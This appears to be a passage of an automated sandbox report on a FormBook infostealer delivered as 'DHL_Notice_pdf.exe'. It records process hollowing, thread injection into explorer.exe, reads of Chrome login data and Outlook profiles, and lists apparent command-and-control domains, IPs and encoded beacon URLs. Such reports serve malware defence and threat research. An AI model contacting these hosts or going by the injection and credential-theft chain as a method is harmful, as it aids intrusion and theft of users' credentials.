          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040CF43 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeThread register set: target process: 3452
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.256717981.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.509870496.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.476512956.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.248850915.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.504678905.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		3
          Obfuscated Files or Information          		LSASS Memory5
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS2
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831175 Sample: DHL_Notice_pdf.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 30 www.madliainsalu.com 2->30 32 madliainsalu.com 2->32 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 5 other signatures 2->54 10 DHL_Notice_pdf.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\zkvixbqxp.exe, PE32 10->28 dropped 13 zkvixbqxp.exe 1 10->13         started        process6 signatures7 68 Multi AV Scanner detection for dropped file 13->68 70 Detected unpacking (changes PE section rights) 13->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->72 74 Maps a DLL or memory area into another process 13->74 16 zkvixbqxp.exe 13->16         started        19 conhost.exe 13->19         started        process8 signatures9 40 Modifies the context of a thread in another process (thread injection) 16->40 42 Maps a DLL or memory area into another process 16->42 44 Sample uses process hollowing technique 16->44 46 Queues an APC in another process (thread injection) 16->46 21 explorer.exe 3 6 16->21 injected process10 dnsIp11 34 bohndigitaltech.com 162.241.24.110, 49708, 49709, 49710 UNIFIEDLAYER-AS-1US United States 21->34 36 kunimi.org 219.94.129.181, 49702, 49703, 49704 SAKURA-CSAKURAInternetIncJP Japan 21->36 38 11 other IPs or domains 21->38 56 System process connects to network (likely due to code injection or exploit) 21->56 58 Performs DNS queries to domains with low reputation 21->58 25 cmmon32.exe 13 21->25         started        signatures12 process13 signatures14 60 Tries to steal Mail credentials (via file / registry access) 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL_Notice_pdf.exe46%ReversingLabsWin32.Trojan.Fragtor
          DHL_Notice_pdf.exe42%VirustotalBrowse
          DHL_Notice_pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe27%ReversingLabsWin32.Trojan.Fragtor

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.zkvixbqxp.exe.9f0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.zkvixbqxp.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          kunimi.org4%VirustotalBrowse
          bohndigitaltech.com5%VirustotalBrowse
          rifleroofers.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.buymyenergy.com0%Avira URL Cloudsafe
          http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==100%Avira URL Cloudmalware
          http://www.bohndigitaltech.com0%Avira URL Cloudsafe
          http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X100%Avira URL Cloudmalware
          http://www.kunimi.org0%Avira URL Cloudsafe
          http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/ds0%Avira URL Cloudsafe
          http://www.buymyenergy.comReferer:0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.amirah.cfd/hpb7/100%Avira URL Cloudphishing
          http://www.amirah.cfd100%Avira URL Cloudphishing
          http://www.bisarropainting.com/hpb7/:0%Avira URL Cloudsafe
          http://www.0dhy.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.admet01.clubReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com/hpb7/100%Avira URL Cloudmalware
          http://www.bohndigitaltech.com/hpb7/0%Avira URL Cloudsafe
          http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ==0%Avira URL Cloudsafe
          http://www.traindic.top/hpb7/100%Avira URL Cloudmalware
          http://www.kunimi.org/hpb7/I0%Avira URL Cloudsafe
          http://www.creative-shield.com/hpb7/0%Avira URL Cloudsafe
          http://www.madliainsalu.comReferer:0%Avira URL Cloudsafe
          http://www.kotelak.ru0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/0%Avira URL Cloudsafe
          http://www.0dhy.xyz0%Avira URL Cloudsafe
          http://www.bohndigitaltech.com/hpb7/Xz.0%Avira URL Cloudsafe
          http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X100%Avira URL Cloudmalware
          http://www.kotelak.ru/hpb7/0%Avira URL Cloudsafe
          http://www.amirah.cfdReferer:0%Avira URL Cloudsafe
          http://www.creative-shield.com/hpb7/:0%Avira URL Cloudsafe
          http://www.admet01.club100%Avira URL Cloudmalware
          http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com/hpb7/j100%Avira URL Cloudmalware
          http://www.bisarropainting.com/hpb7/0%Avira URL Cloudsafe
          http://www.madliainsalu.com0%Avira URL Cloudsafe
          http://www.kotelak.ruReferer:0%Avira URL Cloudsafe
          http://www.denko-kosan.com0%Avira URL Cloudsafe
          http://www.madliainsalu.com/hpb7/0%Avira URL Cloudsafe
          http://www.rifleroofers.com0%Avira URL Cloudsafe
          http://www.buymyenergy.com/hpb7/0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyzReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.comReferer:0%Avira URL Cloudsafe
          http://www.creative-shield.com0%Avira URL Cloudsafe
          http://www.rifleroofers.com/hpb7/0%Avira URL Cloudsafe
          http://www.denko-kosan.comReferer:0%Avira URL Cloudsafe
          http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH10%Avira URL Cloudsafe
          http://www.traindic.top100%Avira URL Cloudmalware
          http://www.creative-shield.comReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com0%Avira URL Cloudsafe
          http://www.yongleproducts.com/hpb7/100%Avira URL Cloudmalware
          http://www.admet01.club/hpb7/100%Avira URL Cloudmalware
          http://www.bisarropainting.comReferer:0%Avira URL Cloudsafe
          http://www.yongleproducts.com0%Avira URL Cloudsafe
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ==0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyz100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kunimi.org
          		219.94.129.181
          		truetrueunknown
          bohndigitaltech.com
          		162.241.24.110
          		truetrueunknown
          www.0dhy.xyz
          		198.46.160.97
          		truetrue
            		unknown
            rifleroofers.com
            		67.222.24.48
            		truetrueunknown
            www.yongleproducts.com
            		1.13.186.125
            		truetrue
              		unknown
              www.traindic.top
              		162.0.231.77
              		truetrue
                		unknown
                madliainsalu.com
                		34.120.137.41
                		truefalse
                  		unknown
                  denko-kosan.com
                  		49.212.180.95
                  		truetrue
                    		unknown
                    windowsupdatebg.s.llnwi.net
                    		95.140.230.128
                    		truefalse
                      		unknown
                      www.bohndigitaltech.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.madliainsalu.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.denko-kosan.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.rifleroofers.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.kunimi.org
                              		unknown
                              		unknowntrue
                                		unknown
                                www.amirah.cfd
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.bisarropainting.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.0dhy.xyz/hpb7/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kunimi.org/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.traindic.top/hpb7/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bohndigitaltech.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.denko-kosan.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rifleroofers.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ==true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.kunimi.orgexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=146E771M.5.drfalse
                                        		high
                                        http://www.buymyenergy.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mindsetlighting.xyz/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.bohndigitaltech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsexplorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.amirah.cfdexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        https://search.yahoo.com?fr=crmas_sfpfcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                          		high
                                          http://www.amirah.cfd/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          http://www.buymyenergy.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bisarropainting.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.admet01.clubReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.adoptiveimmunotech.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.madliainsalu.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kunimi.org/hpb7/Iexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.creative-shield.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kotelak.ruexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0dhy.xyzexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bohndigitaltech.com/hpb7/Xz.explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amirah.cfdReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kotelak.ru/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.creative-shield.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.admet01.clubexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.adoptiveimmunotech.com/hpb7/jexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
